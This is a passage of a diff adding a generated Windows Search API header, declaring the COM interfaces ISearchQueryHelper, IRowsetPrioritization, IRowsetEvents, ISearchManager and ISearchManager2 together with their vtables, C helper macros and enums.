+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_QuerySyntax )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [retval][out] */ __RPC__out SEARCH_QUERY_SYNTAX *pQuerySyntax);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_QueryContentProperties )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [unique][string][in] */ __RPC__in_opt_string LPCWSTR pszContentProperties);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_QueryContentProperties )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [retval][string][out] */ __RPC__deref_out_opt_string LPWSTR *ppszContentProperties);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_QuerySelectColumns )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [unique][string][in] */ __RPC__in_opt_string LPCWSTR pszSelectColumns);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_QuerySelectColumns )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [retval][string][out] */ __RPC__deref_out_opt_string LPWSTR *ppszSelectColumns);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_QueryWhereRestrictions )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [unique][string][in] */ __RPC__in_opt_string LPCWSTR pszRestrictions);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_QueryWhereRestrictions )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [retval][string][out] */ __RPC__deref_out_opt_string LPWSTR *ppszRestrictions);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_QuerySorting )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [unique][string][in] */ __RPC__in_opt_string LPCWSTR pszSorting);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_QuerySorting )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [retval][string][out] */ __RPC__deref_out_opt_string LPWSTR *ppszSorting);
+        
+        HRESULT ( STDMETHODCALLTYPE *GenerateSQLFromUserQuery )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszQuery,
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszSQL);
+        
+        HRESULT ( STDMETHODCALLTYPE *WriteProperties )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [in] */ ITEMID itemID,
+            /* [in] */ DWORD dwNumberOfColumns,
+            /* [size_is][in] */ __RPC__in_ecount_full(dwNumberOfColumns) PROPERTYKEY *pColumns,
+            /* [size_is][in] */ __RPC__in_ecount_full(dwNumberOfColumns) SEARCH_COLUMN_PROPERTIES *pValues,
+            /* [unique][in] */ __RPC__in_opt FILETIME *pftGatherModifiedTime);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_QueryMaxResults )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [in] */ LONG cMaxResults);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_QueryMaxResults )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [retval][out] */ __RPC__out LONG *pcMaxResults);
+        
+        END_INTERFACE
+    } ISearchQueryHelperVtbl;
+
+    interface ISearchQueryHelper
+    {
+        CONST_VTBL struct ISearchQueryHelperVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ISearchQueryHelper_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ISearchQueryHelper_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ISearchQueryHelper_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ISearchQueryHelper_get_ConnectionString(This,pszConnectionString)	\
+    ( (This)->lpVtbl -> get_ConnectionString(This,pszConnectionString) ) 
+
+#define ISearchQueryHelper_put_QueryContentLocale(This,lcid)	\
+    ( (This)->lpVtbl -> put_QueryContentLocale(This,lcid) ) 
+
+#define ISearchQueryHelper_get_QueryContentLocale(This,plcid)	\
+    ( (This)->lpVtbl -> get_QueryContentLocale(This,plcid) ) 
+
+#define ISearchQueryHelper_put_QueryKeywordLocale(This,lcid)	\
+    ( (This)->lpVtbl -> put_QueryKeywordLocale(This,lcid) ) 
+
+#define ISearchQueryHelper_get_QueryKeywordLocale(This,plcid)	\
+    ( (This)->lpVtbl -> get_QueryKeywordLocale(This,plcid) ) 
+
+#define ISearchQueryHelper_put_QueryTermExpansion(This,expandTerms)	\
+    ( (This)->lpVtbl -> put_QueryTermExpansion(This,expandTerms) ) 
+
+#define ISearchQueryHelper_get_QueryTermExpansion(This,pExpandTerms)	\
+    ( (This)->lpVtbl -> get_QueryTermExpansion(This,pExpandTerms) ) 
+
+#define ISearchQueryHelper_put_QuerySyntax(This,querySyntax)	\
+    ( (This)->lpVtbl -> put_QuerySyntax(This,querySyntax) ) 
+
+#define ISearchQueryHelper_get_QuerySyntax(This,pQuerySyntax)	\
+    ( (This)->lpVtbl -> get_QuerySyntax(This,pQuerySyntax) ) 
+
+#define ISearchQueryHelper_put_QueryContentProperties(This,pszContentProperties)	\
+    ( (This)->lpVtbl -> put_QueryContentProperties(This,pszContentProperties) ) 
+
+#define ISearchQueryHelper_get_QueryContentProperties(This,ppszContentProperties)	\
+    ( (This)->lpVtbl -> get_QueryContentProperties(This,ppszContentProperties) ) 
+
+#define ISearchQueryHelper_put_QuerySelectColumns(This,pszSelectColumns)	\
+    ( (This)->lpVtbl -> put_QuerySelectColumns(This,pszSelectColumns) ) 
+
+#define ISearchQueryHelper_get_QuerySelectColumns(This,ppszSelectColumns)	\
+    ( (This)->lpVtbl -> get_QuerySelectColumns(This,ppszSelectColumns) ) 
+
+#define ISearchQueryHelper_put_QueryWhereRestrictions(This,pszRestrictions)	\
+    ( (This)->lpVtbl -> put_QueryWhereRestrictions(This,pszRestrictions) ) 
+
+#define ISearchQueryHelper_get_QueryWhereRestrictions(This,ppszRestrictions)	\
+    ( (This)->lpVtbl -> get_QueryWhereRestrictions(This,ppszRestrictions) ) 
+
+#define ISearchQueryHelper_put_QuerySorting(This,pszSorting)	\
+    ( (This)->lpVtbl -> put_QuerySorting(This,pszSorting) ) 
+
+#define ISearchQueryHelper_get_QuerySorting(This,ppszSorting)	\
+    ( (This)->lpVtbl -> get_QuerySorting(This,ppszSorting) ) 
+
+#define ISearchQueryHelper_GenerateSQLFromUserQuery(This,pszQuery,ppszSQL)	\
+    ( (This)->lpVtbl -> GenerateSQLFromUserQuery(This,pszQuery,ppszSQL) ) 
+
+#define ISearchQueryHelper_WriteProperties(This,itemID,dwNumberOfColumns,pColumns,pValues,pftGatherModifiedTime)	\
+    ( (This)->lpVtbl -> WriteProperties(This,itemID,dwNumberOfColumns,pColumns,pValues,pftGatherModifiedTime) ) 
+
+#define ISearchQueryHelper_put_QueryMaxResults(This,cMaxResults)	\
+    ( (This)->lpVtbl -> put_QueryMaxResults(This,cMaxResults) ) 
+
+#define ISearchQueryHelper_get_QueryMaxResults(This,pcMaxResults)	\
+    ( (This)->lpVtbl -> get_QueryMaxResults(This,pcMaxResults) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ISearchQueryHelper_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_searchapi_0000_0022 */
+/* [local] */ 
+
+typedef /* [public][public][public][v1_enum] */ 
+enum __MIDL___MIDL_itf_searchapi_0000_0022_0001
+    {
+        PRIORITY_LEVEL_FOREGROUND	= 0,
+        PRIORITY_LEVEL_HIGH	= 1,
+        PRIORITY_LEVEL_LOW	= 2,
+        PRIORITY_LEVEL_DEFAULT	= 3
+    } 	PRIORITY_LEVEL;
+
+
+
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0022_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0022_v0_0_s_ifspec;
+
+#ifndef __IRowsetPrioritization_INTERFACE_DEFINED__
+#define __IRowsetPrioritization_INTERFACE_DEFINED__
+
+/* interface IRowsetPrioritization */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_IRowsetPrioritization;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("42811652-079D-481B-87A2-09A69ECC5F44")
+    IRowsetPrioritization : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE SetScopePriority( 
+            /* [in] */ PRIORITY_LEVEL priority,
+            /* [in] */ DWORD scopeStatisticsEventFrequency) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetScopePriority( 
+            /* [out] */ __RPC__out PRIORITY_LEVEL *priority,
+            /* [out] */ __RPC__out DWORD *scopeStatisticsEventFrequency) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetScopeStatistics( 
+            /* [out] */ __RPC__out DWORD *indexedDocumentCount,
+            /* [out] */ __RPC__out DWORD *oustandingAddCount,
+            /* [out] */ __RPC__out DWORD *oustandingModifyCount) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IRowsetPrioritizationVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in IRowsetPrioritization * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in IRowsetPrioritization * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in IRowsetPrioritization * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *SetScopePriority )( 
+            __RPC__in IRowsetPrioritization * This,
+            /* [in] */ PRIORITY_LEVEL priority,
+            /* [in] */ DWORD scopeStatisticsEventFrequency);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetScopePriority )( 
+            __RPC__in IRowsetPrioritization * This,
+            /* [out] */ __RPC__out PRIORITY_LEVEL *priority,
+            /* [out] */ __RPC__out DWORD *scopeStatisticsEventFrequency);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetScopeStatistics )( 
+            __RPC__in IRowsetPrioritization * This,
+            /* [out] */ __RPC__out DWORD *indexedDocumentCount,
+            /* [out] */ __RPC__out DWORD *oustandingAddCount,
+            /* [out] */ __RPC__out DWORD *oustandingModifyCount);
+        
+        END_INTERFACE
+    } IRowsetPrioritizationVtbl;
+
+    interface IRowsetPrioritization
+    {
+        CONST_VTBL struct IRowsetPrioritizationVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IRowsetPrioritization_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IRowsetPrioritization_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IRowsetPrioritization_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IRowsetPrioritization_SetScopePriority(This,priority,scopeStatisticsEventFrequency)	\
+    ( (This)->lpVtbl -> SetScopePriority(This,priority,scopeStatisticsEventFrequency) ) 
+
+#define IRowsetPrioritization_GetScopePriority(This,priority,scopeStatisticsEventFrequency)	\
+    ( (This)->lpVtbl -> GetScopePriority(This,priority,scopeStatisticsEventFrequency) ) 
+
+#define IRowsetPrioritization_GetScopeStatistics(This,indexedDocumentCount,oustandingAddCount,oustandingModifyCount)	\
+    ( (This)->lpVtbl -> GetScopeStatistics(This,indexedDocumentCount,oustandingAddCount,oustandingModifyCount) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IRowsetPrioritization_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_searchapi_0000_0023 */
+/* [local] */ 
+
+typedef /* [public][public][public][public][public][v1_enum] */ 
+enum __MIDL___MIDL_itf_searchapi_0000_0023_0001
+    {
+        ROWSETEVENT_ITEMSTATE_NOTINROWSET	= 0,
+        ROWSETEVENT_ITEMSTATE_INROWSET	= 1,
+        ROWSETEVENT_ITEMSTATE_UNKNOWN	= 2
+    } 	ROWSETEVENT_ITEMSTATE;
+
+typedef /* [public][public][v1_enum] */ 
+enum __MIDL___MIDL_itf_searchapi_0000_0023_0002
+    {
+        ROWSETEVENT_TYPE_DATAEXPIRED	= 0,
+        ROWSETEVENT_TYPE_FOREGROUNDLOST	= 1,
+        ROWSETEVENT_TYPE_SCOPESTATISTICS	= 2
+    } 	ROWSETEVENT_TYPE;
+
+
+
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0023_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0023_v0_0_s_ifspec;
+
+#ifndef __IRowsetEvents_INTERFACE_DEFINED__
+#define __IRowsetEvents_INTERFACE_DEFINED__
+
+/* interface IRowsetEvents */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_IRowsetEvents;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("1551AEA5-5D66-4B11-86F5-D5634CB211B9")
+    IRowsetEvents : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE OnNewItem( 
+            /* [in] */ __RPC__in REFPROPVARIANT itemID,
+            /* [in] */ ROWSETEVENT_ITEMSTATE newItemState) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE OnChangedItem( 
+            /* [in] */ __RPC__in REFPROPVARIANT itemID,
+            /* [in] */ ROWSETEVENT_ITEMSTATE rowsetItemState,
+            /* [in] */ ROWSETEVENT_ITEMSTATE changedItemState) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE OnDeletedItem( 
+            /* [in] */ __RPC__in REFPROPVARIANT itemID,
+            /* [in] */ ROWSETEVENT_ITEMSTATE deletedItemState) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE OnRowsetEvent( 
+            /* [in] */ ROWSETEVENT_TYPE eventType,
+            /* [in] */ __RPC__in REFPROPVARIANT eventData) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IRowsetEventsVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in IRowsetEvents * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in IRowsetEvents * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in IRowsetEvents * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *OnNewItem )( 
+            __RPC__in IRowsetEvents * This,
+            /* [in] */ __RPC__in REFPROPVARIANT itemID,
+            /* [in] */ ROWSETEVENT_ITEMSTATE newItemState);
+        
+        HRESULT ( STDMETHODCALLTYPE *OnChangedItem )( 
+            __RPC__in IRowsetEvents * This,
+            /* [in] */ __RPC__in REFPROPVARIANT itemID,
+            /* [in] */ ROWSETEVENT_ITEMSTATE rowsetItemState,
+            /* [in] */ ROWSETEVENT_ITEMSTATE changedItemState);
+        
+        HRESULT ( STDMETHODCALLTYPE *OnDeletedItem )( 
+            __RPC__in IRowsetEvents * This,
+            /* [in] */ __RPC__in REFPROPVARIANT itemID,
+            /* [in] */ ROWSETEVENT_ITEMSTATE deletedItemState);
+        
+        HRESULT ( STDMETHODCALLTYPE *OnRowsetEvent )( 
+            __RPC__in IRowsetEvents * This,
+            /* [in] */ ROWSETEVENT_TYPE eventType,
+            /* [in] */ __RPC__in REFPROPVARIANT eventData);
+        
+        END_INTERFACE
+    } IRowsetEventsVtbl;
+
+    interface IRowsetEvents
+    {
+        CONST_VTBL struct IRowsetEventsVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IRowsetEvents_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IRowsetEvents_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IRowsetEvents_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IRowsetEvents_OnNewItem(This,itemID,newItemState)	\
+    ( (This)->lpVtbl -> OnNewItem(This,itemID,newItemState) ) 
+
+#define IRowsetEvents_OnChangedItem(This,itemID,rowsetItemState,changedItemState)	\
+    ( (This)->lpVtbl -> OnChangedItem(This,itemID,rowsetItemState,changedItemState) ) 
+
+#define IRowsetEvents_OnDeletedItem(This,itemID,deletedItemState)	\
+    ( (This)->lpVtbl -> OnDeletedItem(This,itemID,deletedItemState) ) 
+
+#define IRowsetEvents_OnRowsetEvent(This,eventType,eventData)	\
+    ( (This)->lpVtbl -> OnRowsetEvent(This,eventType,eventData) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IRowsetEvents_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_searchapi_0000_0024 */
+/* [local] */ 
+
+#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
+#pragma endregion
+#include <winapifamily.h>
+#pragma region Desktop Family
+#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)
+
+
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0024_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0024_v0_0_s_ifspec;
+
+#ifndef __ISearchManager_INTERFACE_DEFINED__
+#define __ISearchManager_INTERFACE_DEFINED__
+
+/* interface ISearchManager */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_ISearchManager;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("AB310581-AC80-11D1-8DF3-00C04FB6EF69")
+    ISearchManager : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE GetIndexerVersionStr( 
+            /* [string][out] */ __RPC__deref_out_opt_string LPWSTR *ppszVersionString) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetIndexerVersion( 
+            /* [out] */ __RPC__out DWORD *pdwMajor,
+            /* [out] */ __RPC__out DWORD *pdwMinor) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetParameter( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszName,
+            /* [retval][out] */ __RPC__deref_out_opt PROPVARIANT **ppValue) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE SetParameter( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszName,
+            /* [in] */ __RPC__in const PROPVARIANT *pValue) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ProxyName( 
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszProxyName) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_BypassList( 
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszBypassList) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE SetProxy( 
+            /* [in] */ PROXY_ACCESS sUseProxy,
+            /* [in] */ BOOL fLocalByPassProxy,
+            /* [in] */ DWORD dwPortNumber,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszProxyName,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszByPassList) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetCatalog( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszCatalog,
+            /* [retval][out] */ __RPC__deref_out_opt ISearchCatalogManager **ppCatalogManager) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_UserAgent( 
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszUserAgent) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_UserAgent( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszUserAgent) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_UseProxy( 
+            /* [retval][out] */ __RPC__out PROXY_ACCESS *pUseProxy) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_LocalBypass( 
+            /* [retval][out] */ __RPC__out BOOL *pfLocalBypass) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PortNumber( 
+            /* [retval][out] */ __RPC__out DWORD *pdwPortNumber) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ISearchManagerVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ISearchManager * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ISearchManager * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ISearchManager * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetIndexerVersionStr )( 
+            __RPC__in ISearchManager * This,
+            /* [string][out] */ __RPC__deref_out_opt_string LPWSTR *ppszVersionString);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetIndexerVersion )( 
+            __RPC__in ISearchManager * This,
+            /* [out] */ __RPC__out DWORD *pdwMajor,
+            /* [out] */ __RPC__out DWORD *pdwMinor);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetParameter )( 
+            __RPC__in ISearchManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszName,
+            /* [retval][out] */ __RPC__deref_out_opt PROPVARIANT **ppValue);
+        
+        HRESULT ( STDMETHODCALLTYPE *SetParameter )( 
+            __RPC__in ISearchManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszName,
+            /* [in] */ __RPC__in const PROPVARIANT *pValue);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProxyName )( 
+            __RPC__in ISearchManager * This,
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszProxyName);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_BypassList )( 
+            __RPC__in ISearchManager * This,
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszBypassList);
+        
+        HRESULT ( STDMETHODCALLTYPE *SetProxy )( 
+            __RPC__in ISearchManager * This,
+            /* [in] */ PROXY_ACCESS sUseProxy,
+            /* [in] */ BOOL fLocalByPassProxy,
+            /* [in] */ DWORD dwPortNumber,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszProxyName,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszByPassList);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetCatalog )( 
+            __RPC__in ISearchManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszCatalog,
+            /* [retval][out] */ __RPC__deref_out_opt ISearchCatalogManager **ppCatalogManager);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UserAgent )( 
+            __RPC__in ISearchManager * This,
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszUserAgent);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UserAgent )( 
+            __RPC__in ISearchManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszUserAgent);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UseProxy )( 
+            __RPC__in ISearchManager * This,
+            /* [retval][out] */ __RPC__out PROXY_ACCESS *pUseProxy);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_LocalBypass )( 
+            __RPC__in ISearchManager * This,
+            /* [retval][out] */ __RPC__out BOOL *pfLocalBypass);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PortNumber )( 
+            __RPC__in ISearchManager * This,
+            /* [retval][out] */ __RPC__out DWORD *pdwPortNumber);
+        
+        END_INTERFACE
+    } ISearchManagerVtbl;
+
+    interface ISearchManager
+    {
+        CONST_VTBL struct ISearchManagerVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ISearchManager_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ISearchManager_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ISearchManager_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ISearchManager_GetIndexerVersionStr(This,ppszVersionString)	\
+    ( (This)->lpVtbl -> GetIndexerVersionStr(This,ppszVersionString) ) 
+
+#define ISearchManager_GetIndexerVersion(This,pdwMajor,pdwMinor)	\
+    ( (This)->lpVtbl -> GetIndexerVersion(This,pdwMajor,pdwMinor) ) 
+
+#define ISearchManager_GetParameter(This,pszName,ppValue)	\
+    ( (This)->lpVtbl -> GetParameter(This,pszName,ppValue) ) 
+
+#define ISearchManager_SetParameter(This,pszName,pValue)	\
+    ( (This)->lpVtbl -> SetParameter(This,pszName,pValue) ) 
+
+#define ISearchManager_get_ProxyName(This,ppszProxyName)	\
+    ( (This)->lpVtbl -> get_ProxyName(This,ppszProxyName) ) 
+
+#define ISearchManager_get_BypassList(This,ppszBypassList)	\
+    ( (This)->lpVtbl -> get_BypassList(This,ppszBypassList) ) 
+
+#define ISearchManager_SetProxy(This,sUseProxy,fLocalByPassProxy,dwPortNumber,pszProxyName,pszByPassList)	\
+    ( (This)->lpVtbl -> SetProxy(This,sUseProxy,fLocalByPassProxy,dwPortNumber,pszProxyName,pszByPassList) ) 
+
+#define ISearchManager_GetCatalog(This,pszCatalog,ppCatalogManager)	\
+    ( (This)->lpVtbl -> GetCatalog(This,pszCatalog,ppCatalogManager) ) 
+
+#define ISearchManager_get_UserAgent(This,ppszUserAgent)	\
+    ( (This)->lpVtbl -> get_UserAgent(This,ppszUserAgent) ) 
+
+#define ISearchManager_put_UserAgent(This,pszUserAgent)	\
+    ( (This)->lpVtbl -> put_UserAgent(This,pszUserAgent) ) 
+
+#define ISearchManager_get_UseProxy(This,pUseProxy)	\
+    ( (This)->lpVtbl -> get_UseProxy(This,pUseProxy) ) 
+
+#define ISearchManager_get_LocalBypass(This,pfLocalBypass)	\
+    ( (This)->lpVtbl -> get_LocalBypass(This,pfLocalBypass) ) 
+
+#define ISearchManager_get_PortNumber(This,pdwPortNumber)	\
+    ( (This)->lpVtbl -> get_PortNumber(This,pdwPortNumber) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ISearchManager_INTERFACE_DEFINED__ */
+
+
+#ifndef __ISearchManager2_INTERFACE_DEFINED__
+#define __ISearchManager2_INTERFACE_DEFINED__
+
+/* interface ISearchManager2 */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_ISearchManager2;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("DBAB3F73-DB19-4A79-BFC0-A61A93886DDF")
+    ISearchManager2 : public ISearchManager
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE CreateCatalog( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszCatalog,
+            /* [out] */ __RPC__deref_out_opt ISearchCatalogManager **ppCatalogManager) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE DeleteCatalog( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszCatalog) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ISearchManager2Vtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ISearchManager2 * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ISearchManager2 * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ISearchManager2 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetIndexerVersionStr )( 
+            __RPC__in ISearchManager2 * This,
+            /* [string][out] */ __RPC__deref_out_opt_string LPWSTR *ppszVersionString);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetIndexerVersion )( 
+            __RPC__in ISearchManager2 * This,
+            /* [out] */ __RPC__out DWORD *pdwMajor,
+            /* [out] */ __RPC__out DWORD *pdwMinor);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetParameter )( 
+            __RPC__in ISearchManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszName,
+            /* [retval][out] */ __RPC__deref_out_opt PROPVARIANT **ppValue);
+        
+        HRESULT ( STDMETHODCALLTYPE *SetParameter )( 
+            __RPC__in ISearchManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszName,
+            /* [in] */ __RPC__in const PROPVARIANT *pValue);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProxyName )( 
+            __RPC__in ISearchManager2 * This,
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszProxyName);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_BypassList )( 
+            __RPC__in ISearchManager2 * This,
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszBypassList);
+        
+        HRESULT ( STDMETHODCALLTYPE *SetProxy )( 
